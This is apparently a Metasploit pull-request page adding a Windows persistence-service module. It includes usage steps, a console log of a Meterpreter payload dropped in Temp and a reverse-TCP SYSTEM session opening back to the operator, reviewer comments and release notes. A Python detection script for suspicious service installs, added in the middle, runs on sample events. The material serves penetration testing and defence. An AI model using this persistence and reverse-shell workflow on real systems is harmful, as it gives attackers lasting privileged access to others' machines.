Add exploit module windows persistent service #11123

Merged
merged 23 commits into from Dec 17, 2018


jrobles-r7 commented Dec 14, 2018

Github was showing #10822 as 200+ commits and 100+ files changed. Opening in new PR so it is shown correctly.

Note: This PR relies on #10821; please merge that before merging this. Could be merged now.

resolved #10385

Verification steps

  • get session on target
  • use post/windows/manage/persistence_service
  • set payload <payload>
  • set lport <lport>
  • set lhost <lhost>
  • set handler true
  • run

Usage

msf5 post(windows/manage/persistence_service) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: test-PC\test
meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/manage/persistence_service) > options

Module options (post/windows/manage/persistence_service):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  true                             no        Start an exploit/multi/handler to receive the connection
   LHOST    192.168.56.1                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        The payload to use in the service.
   SESSION  1                                yes       The session to run this module on.
msf5 post(windows/manage/persistence_service) > run

[*] Running module against TEST-PC
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.1:4433
[+] Meterpreter service exe written to C:\Users\test\AppData\Local\Temp\IDJkb.exe
[*] Creating service pWbPkeDm
[*] Cleanup Meterpreter RC File: /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc
[*] Post module execution completed
[*] Sending stage (179779 bytes) to 192.168.56.101
msf5 post(windows/manage/persistence_service) > [*] Meterpreter session 3 opened (192.168.56.1:4433 -> 192.168.56.101:50101) at 2018-10-17 18:37:51 +0800
msf5 post(windows/manage/persistence_service) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x86/windows  test-PC\test @ TEST-PC         192.168.56.1:8888 -> 192.168.56.101:50098 (192.168.56.101)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ TEST-PC  192.168.56.1:4433 -> 192.168.56.101:50101 (192.168.56.101)

msf5 post(windows/manage/persistence_service) >

Enjoy it!
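From the defender's side, the run above leaves a conventional trace: a new service whose image lives in the user's %TEMP% directory, started as LocalSystem. The following triage pass over Windows System-log 7045 ("A service was installed in the system") records flags that pattern; it is an added example, not code from this PR or the module, and the event records are constructed sample data whose field names are assumptions rather than any particular SIEM schema.

```python
from __future__ import annotations
import re

SERVICE_INSTALLED = 7045  # System log: "A service was installed in the system"

# User-writable locations where a legitimate service binary rarely lives; the
# transcript above drops its exe into AppData\Local\Temp.
SUSPICIOUS_DIRS = re.compile(
    r"\\(AppData\\Local\\Temp|Windows\\Temp|Users\\Public)\\", re.IGNORECASE)

# Constructed sample events, not real telemetry; field names are assumed rather
# than taken from any SIEM schema. The first mirrors the module run in the PR.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "pWbPkeDm",
     "ImagePath": r"C:\Users\test\AppData\Local\Temp\IDJkb.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "gupdate",
     "ImagePath": r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc',
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "pWbPkeDm", "ImagePath": "",
     "StartType": "", "AccountName": ""},  # a state change, not an install
]

def binary_path(image_path: str) -> str:
    """Executable from an ImagePath (may be quoted, may carry args); cut at the first '.exe'."""
    m = re.match(r'\s*"?(.*?\.exe)', image_path, re.IGNORECASE)
    return m.group(1) if m else image_path.strip().strip('"')

def assess_event(ev: dict) -> list[str]:
    """Reasons a 7045 event looks like a dropped persistence service ([] if benign)."""
    if ev.get("EventID") != SERVICE_INSTALLED:
        return []
    path = binary_path(ev.get("ImagePath", ""))
    reasons = []
    if SUSPICIOUS_DIRS.search(path):
        reasons.append(f"binary in user-writable directory: {path}")
    elif re.match(r"^[a-z]:\\Users\\", path, re.IGNORECASE):
        reasons.append(f"binary under a user profile: {path}")
    if not reasons:
        return []  # location is the trigger; the checks below only add severity
    if ev.get("AccountName", "").lower() in ("localsystem", r"nt authority\system"):
        reasons.append("runs as LocalSystem")
    if ev.get("StartType", "").lower().startswith("auto"):
        reasons.append("auto start, so it survives reboot")
    return reasons

def find_suspicious_services(events: list[dict]) -> dict[str, list[str]]:
    return {ev["ServiceName"]: r for ev in events if (r := assess_event(ev))}
```

Feeding real 7045 records through `find_suspicious_services` would catch the run shown above, while the two system-path services and the non-install event pass untouched.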

Green-m and others added some commits Oct 17, 2018

@jrobles-r7 jrobles-r7 changed the title Feature/win service Add exploit module windows persistent service Dec 14, 2018

@Green-m Green-m added the msf5 label Dec 14, 2018

Green-m commented Dec 14, 2018

Should be only valid for msf5 on account of the metasm compiler feature.

@jrobles-r7 jrobles-r7 self-assigned this Dec 14, 2018

@jrobles-r7 jrobles-r7 added the feature label Dec 14, 2018

jrobles-r7 and others added some commits Dec 14, 2018

jrobles-r7 left a comment

Some changes are needed to handle paths with spaces.
In the C code, the logic for checking install/start of the service can be changed to compare against the last provided argument, argv[argc-1]. Using the last argument will let us keep the strtok logic that is currently in the code and let us handle paths with spaces.

Review comment on modules/exploits/windows/local/persistence_service.rb (resolved, outdated)

Green-m and others added some commits Dec 17, 2018

Merge pull request #6 from jrobles-r7/patch/service_space
Fix additional path space issues

@jrobles-r7 jrobles-r7 merged commit cb0cde3 into rapid7:master Dec 17, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

jrobles-r7 added a commit that referenced this pull request Dec 17, 2018

jrobles-r7 commented Dec 17, 2018

Release Notes

The exploit/windows/local/persistence_service module can be used to create a Windows service for persistence.

jrobles-r7 commented Dec 17, 2018

Thanks @Green-m !

@Green-m Green-m deleted the Green-m:feature/win_service branch Dec 18, 2018
